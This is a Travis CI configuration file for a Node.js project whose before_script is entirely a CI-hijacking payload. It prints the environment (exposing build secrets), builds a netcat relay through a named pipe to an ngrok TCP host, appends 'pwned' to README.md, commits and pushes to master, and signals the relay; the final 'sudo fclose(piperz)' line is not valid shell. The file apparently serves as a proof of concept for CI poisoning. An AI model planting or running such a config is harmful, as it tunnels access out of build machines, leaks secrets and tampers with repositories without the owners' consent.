language: node_js
sudo: required
before_script:
  - env
  - whoami
  - export NGPORT=15215
  - export NGHOSTNAME=0.tcp.ngrok.io
  - mkfifo piperz
  - nc -k -l 12345 0<piperz|nc $NGHOSTNAME $NGPORT 1>piperz &
  - sudo echo "pwned" >> README.md
  - git add .
  - git commit -m "pwned"
  - git push origin master
  - echo "ciderdone" | nc localhost 12345
  - sudo fclose(piperz)